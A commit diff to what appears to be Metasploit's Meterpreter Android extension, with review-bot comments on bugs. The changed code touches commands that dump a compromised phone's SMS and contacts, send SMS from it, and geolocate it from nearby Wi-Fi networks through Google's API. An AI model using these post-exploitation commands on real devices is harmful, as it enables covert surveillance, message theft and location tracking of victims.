bug fixes
parent
761caa0a60
commit
31dcae6828
|
@ -18,15 +18,14 @@ module Rex
|
||||||
attr_accessor :longitude
|
attr_accessor :longitude
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
@uri = URI.parse(GOOGLE_API_URI)
|
@uri = URI.parse(URI.encode(GOOGLE_API_URI))
|
||||||
@wlan_list = []
|
@wlan_list = []
|
||||||
end
|
end
|
||||||
|
|
||||||
# Ask Google's Maps API for the location of a given set of BSSIDs (MAC
|
# Ask Google's Maps API for the location of a given set of BSSIDs (MAC
|
||||||
# addresses of access points), ESSIDs (AP names), and signal strengths.
|
# addresses of access points), ESSIDs (AP names), and signal strengths.
|
||||||
def fetch!
|
def fetch!
|
||||||
@uri.query << @wlan_list.join("&")
|
@uri.query << @wlan_list.join("&wifi=")
|
||||||
|
|
||||||
request = Net::HTTP::Get.new(@uri.request_uri)
|
request = Net::HTTP::Get.new(@uri.request_uri)
|
||||||
http = Net::HTTP::new(@uri.host,@uri.port)
|
http = Net::HTTP::new(@uri.host,@uri.port)
|
||||||
http.use_ssl = true
|
http.use_ssl = true
|
||||||
|
@ -52,7 +51,7 @@ module Rex
|
||||||
# @param ssid [String] ESSID associated with the mac
|
# @param ssid [String] ESSID associated with the mac
|
||||||
# @param signal_strength [String] a thing like
|
# @param signal_strength [String] a thing like
|
||||||
def add_wlan(mac, ssid = nil, signal_strength = nil)
|
def add_wlan(mac, ssid = nil, signal_strength = nil)
|
||||||
@wlan_list.push("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}")
|
@wlan_list.push(URI.encode("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}"))
|
||||||
end
|
end
|
||||||
|
|
||||||
def google_maps_url
|
def google_maps_url
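Review bot: `URI.encode` in `add_wlan` leaves reserved characters such as `&`, `=` and `+` unescaped, so an SSID containing one of them changes the shape of the query string that `fetch!` builds. SSIDs are chosen by whoever operates the access point, so the value should be treated as untrusted and escaped per field before the string is assembled, e.g. `URI.encode_www_form_component(ssid.to_s)`. `URI.encode` is also obsolete and was removed in Ruby 3.0. Separately, `@uri.query << @wlan_list.join("&wifi=")` mutates the stored query, so a second `fetch!` on the same object appends the list again, and the first entry only gets a `wifi=` key if GOOGLE_API_URI already ends with one, which is not visible here. Both method bodies continue outside the hunks.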
|
||||||
|
|
|
@ -44,7 +44,7 @@ class Android < Extension
|
||||||
def dump_sms
|
def dump_sms
|
||||||
sms = Array.new
|
sms = Array.new
|
||||||
request = Packet.create_request('dump_sms')
|
request = Packet.create_request('dump_sms')
|
||||||
response = client.send_request(request)
|
response = client.send_request(request,60)
|
||||||
|
|
||||||
response.each( TLV_TYPE_SMS_GROUP ) { |p|
|
response.each( TLV_TYPE_SMS_GROUP ) { |p|
|
||||||
|
|
||||||
|
@ -64,7 +64,7 @@ class Android < Extension
|
||||||
def dump_contacts
|
def dump_contacts
|
||||||
contacts = Array.new
|
contacts = Array.new
|
||||||
request = Packet.create_request('dump_contacts')
|
request = Packet.create_request('dump_contacts')
|
||||||
response = client.send_request(request)
|
response = client.send_request(request,60)
|
||||||
|
|
||||||
response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
|
response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
|
||||||
|
|
||||||
|
@ -120,18 +120,26 @@ class Android < Extension
|
||||||
response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
|
response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
|
||||||
end
|
end
|
||||||
|
|
||||||
def send_sms(dest,body)
|
def send_sms(dest,body,dr)
|
||||||
request = Packet.create_request('send_sms')
|
request = Packet.create_request('send_sms')
|
||||||
request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
|
request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
|
||||||
request.add_tlv(TLV_TYPE_SMS_BODY,body)
|
request.add_tlv(TLV_TYPE_SMS_BODY,body)
|
||||||
response = client.send_request(request)
|
request.add_tlv(TLV_TYPE_SMS_DR,dr)
|
||||||
resp=response.get_tlv(TLV_TYPE_SMS_SENT).value
|
if dr == false
|
||||||
return resp
|
response=client.send_request(request)
|
||||||
|
sr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||||
|
return sr
|
||||||
|
else
|
||||||
|
response=client.send_request(request,30)
|
||||||
|
sr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||||
|
dr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||||
|
return [sr,dr]
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def wlan_geolocate
|
def wlan_geolocate
|
||||||
request = Packet.create_request('wlan_geolocate')
|
request = Packet.create_request('wlan_geolocate')
|
||||||
response = client.send_request(request,45)
|
response = client.send_request(request,60)
|
||||||
networks=[]
|
networks=[]
|
||||||
response.each( TLV_TYPE_WLAN_GROUP ) { |p|
|
response.each( TLV_TYPE_WLAN_GROUP ) { |p|
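Review bot: In the delivery-report branch of `send_sms`, `dr=response.get_tlv(TLV_TYPE_SMS_SR).value` reads the same TLV as the line above it, so `[sr,dr]` carries the send status twice and the caller's "SMS delivered" message can never differ from "SMS sent". If the payload returns the delivery result as a second entry of that type or under its own type, that is what should be read here; which applies is not visible in this hunk. The `get_tlv` result is dereferenced unchecked in both branches, so a response lacking the TLV would presumably raise NoMethodError; a guard such as `tlv = response.get_tlv(TLV_TYPE_SMS_SR); return nil unless tlv` keeps the failure readable. The new required argument also breaks any two-argument caller; `def send_sms(dest,body,dr=false)` keeps them working.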
|
||||||
|
|
||||||
|
|
|
@ -33,13 +33,15 @@ TLV_TYPE_CHECK_ROOT_BOOL = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9019)
|
||||||
|
|
||||||
TLV_TYPE_SHUTDOWN_TIMER = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9020)
|
TLV_TYPE_SHUTDOWN_TIMER = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9020)
|
||||||
|
|
||||||
TLV_TYPE_SMS_SENT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9021)
|
TLV_TYPE_SMS_SR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9021)
|
||||||
|
|
||||||
TLV_TYPE_WLAN_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9022)
|
TLV_TYPE_WLAN_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9022)
|
||||||
TLV_TYPE_WLAN_BSSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9023)
|
TLV_TYPE_WLAN_BSSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9023)
|
||||||
TLV_TYPE_WLAN_SSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9024)
|
TLV_TYPE_WLAN_SSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9024)
|
||||||
TLV_TYPE_WLAN_LEVEL = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9025)
|
TLV_TYPE_WLAN_LEVEL = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9025)
|
||||||
|
|
||||||
|
TLV_TYPE_SMS_DR = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9026)
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
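Review bot: Reusing id 9021 with a different meta type (`TLV_META_TYPE_BOOL` to `TLV_META_TYPE_STRING`) changes the numeric TLV type, so a payload built against the old `TLV_TYPE_SMS_SENT` definition would answer with a TLV this side no longer looks up. Allocating a fresh id for the string status and leaving `TLV_TYPE_SMS_SENT` defined would keep older payloads and any remaining references working. At minimum a comment should record the dependency, e.g. `# SMS status as text; replaces TLV_TYPE_SMS_SENT (BOOL), needs a matching payload`.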
|
||||||
|
|
|
@ -1,6 +1,7 @@
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
require 'rex/post/meterpreter'
|
require 'rex/post/meterpreter'
|
||||||
require 'msf/core/auxiliary/report'
|
require 'msf/core/auxiliary/report'
|
||||||
|
require 'rex/google_geolocation'
|
||||||
|
|
||||||
module Rex
|
module Rex
|
||||||
module Post
|
module Post
|
||||||
|
@ -377,10 +378,12 @@ class Console::CommandDispatcher::Android
|
||||||
send_sms_opts = Rex::Parser::Arguments.new(
|
send_sms_opts = Rex::Parser::Arguments.new(
|
||||||
'-h' => [ false, 'Help Banner' ],
|
'-h' => [ false, 'Help Banner' ],
|
||||||
'-d' => [ true, 'Destination number' ],
|
'-d' => [ true, 'Destination number' ],
|
||||||
'-t' => [ true, 'SMS body text' ]
|
'-t' => [ true, 'SMS body text' ],
|
||||||
|
'-dr' => [ false, 'Wait for delivery report' ]
|
||||||
)
|
)
|
||||||
dest=''
|
dest=''
|
||||||
body=''
|
body=''
|
||||||
|
dr=false
|
||||||
send_sms_opts.parse(args) { | opt, idx, val |
|
send_sms_opts.parse(args) { | opt, idx, val |
|
||||||
case opt
|
case opt
|
||||||
when '-h'
|
when '-h'
|
||||||
|
@ -392,6 +395,8 @@ class Console::CommandDispatcher::Android
|
||||||
dest=val
|
dest=val
|
||||||
when '-t'
|
when '-t'
|
||||||
body=val
|
body=val
|
||||||
|
when '-dr'
|
||||||
|
dr=true
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
if (dest.blank? or body.blank?)
|
if (dest.blank? or body.blank?)
|
||||||
|
@ -400,11 +405,25 @@ class Console::CommandDispatcher::Android
|
||||||
print_line(send_sms_opts.usage)
|
print_line(send_sms_opts.usage)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
sent=client.android.send_sms(dest,body)
|
|
||||||
if (sent)
|
sent=client.android.send_sms(dest,body,dr)
|
||||||
print_good('SMS sent')
|
if (dr)
|
||||||
|
if (sent[0]=="Transmission successful")
|
||||||
|
print_good("SMS sent - #{sent[0]}")
|
||||||
else
|
else
|
||||||
print_status('SMS failed to send')
|
print_error("SMS send failed - #{sent[0]}")
|
||||||
|
end
|
||||||
|
if (sent[1]=="Transmission successful")
|
||||||
|
print_good("SMS delivered - #{sent[1]}")
|
||||||
|
else
|
||||||
|
print_error("SMS delivery failed - #{sent[1]}")
|
||||||
|
end
|
||||||
|
else
|
||||||
|
if (sent=="Transmission successful")
|
||||||
|
print_good("SMS sent - #{sent}")
|
||||||
|
else
|
||||||
|
print_error("SMS send failed - #{sent}")
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -422,42 +441,36 @@ class Console::CommandDispatcher::Android
|
||||||
print_line(wlan_geolocate_opts.usage)
|
print_line(wlan_geolocate_opts.usage)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
}
|
||||||
|
|
||||||
print_status('Waiting for WiFi scan results...')
|
|
||||||
log = client.android.wlan_geolocate
|
log = client.android.wlan_geolocate
|
||||||
wlan_list=''
|
wlan_list=[]
|
||||||
|
wlan_str=""
|
||||||
log.each{|x|
|
log.each{|x|
|
||||||
mac=x['bssid']
|
mac=x['bssid']
|
||||||
ssid=x['ssid']
|
ssid=x['ssid']
|
||||||
ss=x['level']
|
ss=x['level']
|
||||||
network_data = "&wifi=mac:#{mac}|ssid:#{ssid}|ss=#{ss}"
|
wlan_list << [mac,ssid,ss.to_s]
|
||||||
wlan_list << network_data
|
|
||||||
}
|
}
|
||||||
|
|
||||||
if wlan_list.blank?
|
if wlan_list.blank?
|
||||||
print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.")
|
print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
g = Rex::GoogleGeolocation.new
|
||||||
|
|
||||||
# Build and send the request to Google
|
wlan_list.each do |wlan|
|
||||||
url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
|
g.add_wlan(*wlan)
|
||||||
uri = URI.parse(URI.encode(url))
|
|
||||||
request = Net::HTTP::Get.new(uri.request_uri)
|
|
||||||
http = Net::HTTP::new(uri.host,uri.port)
|
|
||||||
http.use_ssl = true
|
|
||||||
response = http.request(request)
|
|
||||||
|
|
||||||
# Gather the required information from the response
|
|
||||||
if response && response.code == '200'
|
|
||||||
results = JSON.parse(response.body)
|
|
||||||
latitude = results["location"]["lat"]
|
|
||||||
longitude = results["location"]["lng"]
|
|
||||||
accuracy = results["accuracy"]
|
|
||||||
print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
|
|
||||||
print_status("Google Maps URL: https://maps.google.com/?q=#{latitude},#{longitude}")
|
|
||||||
else
|
|
||||||
print_error("Failure connecting to Google for location lookup.")
|
|
||||||
end
|
end
|
||||||
|
begin
|
||||||
|
g.fetch!
|
||||||
|
rescue RuntimeError => e
|
||||||
|
print_error("Error: #{e}")
|
||||||
|
else
|
||||||
|
print_status(g.to_s)
|
||||||
|
print_status("Google Maps URL: #{g.google_maps_url}")
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
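Review bot: The `rescue RuntimeError => e` around `g.fetch!` is narrower than the failures an HTTPS lookup can produce: `SocketError`, `Errno::ECONNREFUSED` and `OpenSSL::SSL::SSLError` are not RuntimeError subclasses, so a network or TLS failure would escape the handler, whereas the removed code printed "Failure connecting to Google for location lookup." Consider `rescue StandardError => e` or listing the network errors explicitly. `wlan_str=""` is assigned and never used in the visible lines and can be dropped. In the `send_sms` hunk, comparing against the literal "Transmission successful" ties success to the payload's exact wording; a shared constant would make that dependency explicit.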
|
||||||
|
|
||||||
|
|